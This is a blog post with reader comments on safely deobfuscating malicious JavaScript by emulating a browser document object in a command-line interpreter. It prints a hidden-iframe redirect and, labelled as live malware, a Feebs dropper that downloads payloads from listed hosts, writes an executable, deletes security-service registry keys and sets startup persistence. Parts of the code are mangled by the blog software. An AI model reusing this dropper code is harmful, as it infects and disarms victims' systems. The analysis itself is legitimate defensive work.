Safely Investigating Malicious JavaScript
by Jose Nazario
Every now and then, malicious or obfuscated JavaScript will appear on the radar, and this is how I’ve developed ways to determine what’s going on. The goals of malicious JavaScript are obvious: exploit a web browser vulnerability. The goals of obfuscated JavaScript are a bit more complicated: get the JavaScript past the filters to direct someone to a malicious page. Not really complicated, but they are hoping to get past the proxies and sensors in place.
Here’s a sample that came in a malicious e-mail. It did not exploit anything, but it would take a user to another page where malicious HTML was waiting:
(ejtqmbz;opof(!xjeui>2!ifjhiu>2!tsd>(iuuq; 0usvtu5gsff/xt0@je>joefy31(?=0jgsbnf?#*>>
Did you get that? Did you see what is going to happen? You can load it in your browser and dump the DOM, but if you want to watch more directly, you can use a command line JavaScript toolkit to execute the code. I use the NJS toolset, which gives me a command line compiler, error checking, the whole gamut. So, now I dump my JavaScript under study into a file (“mal.js”) and then use the JavaScript interpreter (“js”) to execute it:
$ js mal.js
VM: warning: using undefined global `document'
js: evaluation of file `mal.js' failed: StringStream:1: illegal object for call_method
Oops! That doesn’t work! Note that it is trying to write to an object called “document.” If you know JavaScript, then you know that this is the current document in the web browser window. Since no such object exists on the command line, we have to make one. So, we prepend the following code to our suspicious input file:
function MyDoc() {
  // Attach write() as a method on the object being constructed, so that
  // document.write(...) resolves to it. print() is the interpreter's
  // console output function (NJS here; other engines use console.log).
  this.write = function(text) {
    print(text);
  };
}
document = new MyDoc();
This creates a document object and gives it a write() method, just like the one a normal web browser provides. When we run it, we can see our output (note that I’ve obfuscated the tags to prevent your browser from interpreting them):
$ js mal.js
[iframe style='display:none' width=1 height=1 xsrc='http://trust4free.ws/?id=index20'][/iframe]
Success! We have studied some basic obfuscated JavaScript. There are a dozen or so different variants of this per month; it seems to be someone’s favorite trick right now. There is nothing special about it, just some basic obfuscation, and now you can make sense of it.
We can even do this for a Feebs variant that is nothing more than obfuscated JavaScript. If you look at the source of a Feebs sample, it doesn’t make sense. So, let the trickery begin: prepend the document object creation and then execute it (tags obfuscated again; this is live malware):
$ js Extended Html File.hta.js
Connecting to HotMail.com secure mail server…[script language =
JavaScript] function u() {document.write(’Unable To Connect to Server.
Please check your Internet connection and try again. [script
language=JavaScript]cj=unescape(”%5C”);dr=”c:”+cj+”Recycled”+cj;
g=dr+”userin it.exe”;try{y=new
ActiveXObject(”Scripting.FileSystemObject”); z=new
ActiveXObject(”WScript.Shell”);nx=1;if(y.FileExists(g)){ex=y.GetFile(g);
if(e x.size]20000)nx=0;}function fl(){return
false}document.oncontextmenu=fl;
y.CreateFolder(dr);}catch(t1){};[/script] [s cript language=”vbs”]If
nx Thennset
IE=CreateObject(”InternetExplorer.Application”)nIE.Visible=0nSub
SpnWhile IE.Busy=truenWendnEnd Subnur=
Array(”poljop.freecoolsite.com/test.txt”,”hoop.kazan.bz/god.txt”,”
fr33.by.ru/ol.txt”,”nolko.t35.com/god.c”,”jmo31.by.ru/big.txt”,”psyt.woz.
bz/test.txt”,”duuw.nm.ru/ol.txt”)nFor un=0 To 6nIE.Navigate(ur(un))
nSpni=IE.Document.body.innerTextnIf Len(i)]50000 ThennExit FornEnd
Ifni=”"nNextnSub bsnc=Len(i)nIf(c)Then
nf=”ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuv
wxyz0123456789+/”n For e=1 To c Step 4np=3nr=0nFor h=0 To
3nj=Mid(i,e+h,1)nIf j=”=” Thennp=p-1nk=0nElseIf j=”?” ThennSet
b=y.CreateTextFile(g,True)n b.Write snb.ClosenExit
SubnElsenk=InStr(1,f,j,vbBinaryCompare)-1nEnd
Ifnr=64*r+knNextnr=Hex(r)nr=String(6-Len(r),”0″)&rn
t=Chr(CByte(”&H”&Mid (r,1,2)))+Chr(CByte(”&H”&Mid(r,3,2)))+Chr(
CByte(”&H”&Mid(r,5,2)))ns=s&Left( t,p)nNextnEnd IfnEnd SubnEnd
Ifnbsnz.RegWrite “HKCUSoftwareMicrosoftInternet
Explorermal”,”NAME@DOMAIN.COM”,”REG_SZ”[/script][script
language=JavaScript]function f1(){b1=0;function
f2(na){b2=0;r1=”HKLM”+cj+”SYSTEM”+cj+”CurrentControlSet”+cj+”Services”+cj;tr
y{z.RegDelete(r1+na+cj);b2=1;}catch(t1){};return(b2);}r2=”HKLM”+cj+”SOFTWARE
“+cj+”Microsoft”+cj;ke=”Active Setup”+cj+”Installed
Components”+cj+”{CD5AC91B-AE7B-E83A-0C4C-E616075972F3}”+cj+”Stubpath”;if(f2(
“pcipim”)+f2(”pcIPPsC”)+f2(”RapDrv”)+f2(”FirePM”)+f2(”KmxFile”))b1=1;try{z.R
egWrite(r2+ke,g,”REG_SZ”);z.RegRead(r2+ke);}catch(t1){try{y.CopyFile(g,z.Reg
Read(r2+”Windows”+cj+”CurrentVersion”+cj+”Explorer”+cj+”Shell
Folders”+cj+”Common
Startup”)+cj);}catch(t1){b1=0};};return(b1);}try{if(nx&&!f1())z.run(g);}catc
h(x){};[/script]’); }; setTimeout(”u()”, 0); [/script]
Now, with something like Feebs, this is a lot more complicated: you have to repeat the process, and you also have to use the VBScript interpreter on a Microsoft Windows system to finish the investigation, but you get the idea. Feebs downloads a number of pieces and processes them, installs the result using VBScript, and then launches it.
And that’s a very simple way to start investigating malicious JavaScript in a safe(r) environment. You’ll find this kind of obfuscation often used by commercial HTML protection tools, and sometimes cribbed by the malware community. In the former case it is used to frustrate analysis of the HTML (i.e. some special tricks used to get layout working just right); in the latter, of the JavaScript, in order to bypass security checks.
Running 0.2.5 NGS-JS, I’m not getting the same verbose error messages you are. Just generic “syntax error” messages. A quick look through the man pages didn’t show any obvious verbosity that changed the error reporting type. Additionally, while the vanilla code without the obfuscated code works fine, when I add that in, I get a syntax error.
Any ideas? I’ve copied and pasted a couple of times to make sure I didn’t fat finger something.
$ js mal.js
js: evaluation of file `mal.js’ failed:
mal.js:7: syntax error
Where mal.js:
function MyDoc() {
function write(text) {
print(text);
}
}
document=new MyDoc();
(ejtqmbz;opof(!xjeui>2!ifjhiu>2!tsd>(iuuq;
0usvtu5gsff/xt0@je>joefy31(?=0jgsbnf?#*>>
(Incidentally, I’m not sure what html will work in comments, so we’ll see how much of this makes it through as a comment)
May 2nd, 2006 at 9:33 am
WordPress has a tendency to completely screw up technical content. I can’t say I like this software in the least; layout and content get munged.
Contact me directly and I’ll forward you a flat text representation of this technique. It’s all cut and paste from actual investigations, so I know it works.
jose _at_ arbor DOT net